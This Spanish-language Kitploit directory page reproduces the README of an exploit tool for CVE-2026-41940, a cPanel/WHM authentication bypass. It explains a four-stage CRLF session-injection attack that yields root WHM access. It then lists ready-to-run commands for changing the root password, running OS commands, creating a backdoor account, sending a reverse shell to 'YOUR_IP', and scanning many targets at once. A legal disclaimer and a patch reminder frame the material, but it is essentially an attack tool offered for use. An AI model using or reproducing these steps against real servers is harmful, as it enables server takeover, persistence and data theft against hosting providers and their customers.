Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/kill1234545/cve-2026-41940
Autenticación y AutorizaciónEscalada de PrivilegiosMecanismos de PersistenciaAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de Penetración
GitHubkill1234545/cve-2026-41940

CVE-2026-41940

cPanel/WHM Bypass de Autenticación (Vulnerabilidad de Día Cero)

Ver Repositorio
102hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-41940: Bypass de autenticación en cPanel/WHM (objetivo único y múltiple)

Aviso legal: Este documento y el script asociado (exploit.py) se proporcionan estrictamente con fines educativos, investigación de seguridad y pruebas de penetración autorizadas. No utilice este software contra sistemas que no posea o para los que no tenga permiso explícito de prueba.

Descripción general

exploit.py es un script que demuestra una vulnerabilidad de omisión de autenticación (CVE-2026-41940) en cPanel y WHM. La vulnerabilidad permite a un atacante no autenticado inyectar una sesión root en la caché del daemon mediante una falla de inyección CRLF, otorgando finalmente acceso WHM a nivel root sin requerir credenciales válidas.

Análisis de vulnerabilidad y flujo del exploit

El exploit funciona aprovechando una vulnerabilidad de inyección CRLF (Retorno de carro y avance de línea) dentro del mecanismo de manejo de autenticación básica, combinada con una falla de propagación de sesión. El script automatiza el ataque en cuatro etapas:

  1. Acuñación de sesión pre-autenticación: Se conecta a endpoints de inicio de sesión públicos (por ejemplo, /login/ o /cgi/login.cgi) para adquirir una cookie de sesión no autenticada de referencia (whostmgrsession).
  2. Inyección CRLF: Envía una cabecera de autenticación básica manipulada que contiene una carga codificada en Base64 que inyecta campos de sesión root directamente en la caché de sesión de cpsrvd. La respuesta de redirección del servidor filtra el token de seguridad generado (cpsess).
  3. Propagación de sesión: La cookie de sesión sin procesar se envía a un endpoint WHM autenticado, lo que desencadena do_token_denied para propagar la sesión forjada en la caché del daemon, convirtiéndola en una sesión autenticada válida.
  4. Verificación: Accede a endpoints restringidos de la API de WHM (por ejemplo, /json-api/version) usando la sesión forjada para confirmar el acceso a nivel root.

Requisitos previos

  • Python 3.x
  • biblioteca requests
root@kitploit:~
pip install requests

Uso

root@kitploit:~
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

Argumentos

Selección de objetivo

ArgumentoDescripción
--target URLURL única de WHM (p. ej., https://target:2087)
--target-file FILEArchivo con objetivos (un ip:puerto por línea) — activa automáticamente el modo de comprobación

Opciones de red y núcleo

Opciones de explotación (después del bypass)

Opciones de salida

ArgumentoDescripción
--output FILEGuardar el token de sesión y los detalles en un archivo JSON

Ejemplos

root@kitploit:~
# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

Comandos del shell interactivo

Al usar --shell, están disponibles los siguientes comandos:


Recordatorio

Actualice inmediatamente los últimos parches de seguridad de cPanel/WHM.

Descargar herramienta
ArgumentoDescripción
--threads NHilos concurrentes para el modo de múltiples objetivos (predeterminado: 10)
--hostname HOSTSobrescribir la cabecera Host — úselo cuando la detección automática falle o devuelva un nombre de host incorrecto
--timeout NTiempo de espera por solicitud en segundos (predeterminado: 15)
--retries NNúmero de reintentos en errores de red (predeterminado: 3)
--cookie-name NAMEForzar un nombre específico de cookie de sesión (se detecta automáticamente si se omite)
--no-verifyOmitir la verificación de la Etapa 4 y continuar de todos modos
ArgumentoDescripción
--checkModo de solo comprobación: verifica la vulnerabilidad sin explotar (se establece automáticamente con --target-file)
--password PASSCambiar la contraseña de root a PASS
--api FUNCLlamar a una función específica de la API JSON de WHM
--api-params K=V,...Parámetros separados por comas para --api
--exec CMDEjecutar un comando del sistema operativo a través de WHM scripts/run_script (alternativa: rawexec)
--sessionGenerar una URL de inicio de sesión root de un clic — ábrala inmediatamente, el token expira rápido
--shellEntrar en un shell interactivo de WHM (solo objetivo único)
--dumpVolcar información del servidor: versión, cuentas, zonas DNS, privilegios
--add-user USER PASS DOMAINCrear una nueva cuenta de alojamiento cPanel
--revshell LHOST LPORTEnviar una shell inversa de bash a su listener
ComandoDescripción
api <function> [k=v ...]Llamar a una función de la API JSON de WHM (p. ej., api version)
exec <command>Ejecutar un comando del sistema operativo a través de WHM (p. ej., exec id)
passwd <newpass>Cambiar la contraseña de root
dumpVolcar información del servidor
revshell <lhost> <lport>Enviar una shell inversa
add <user> <pass> <domain>Crear una cuenta de cPanel
save <path>Guardar la sesión actual en un archivo
exit / quitSalir del shell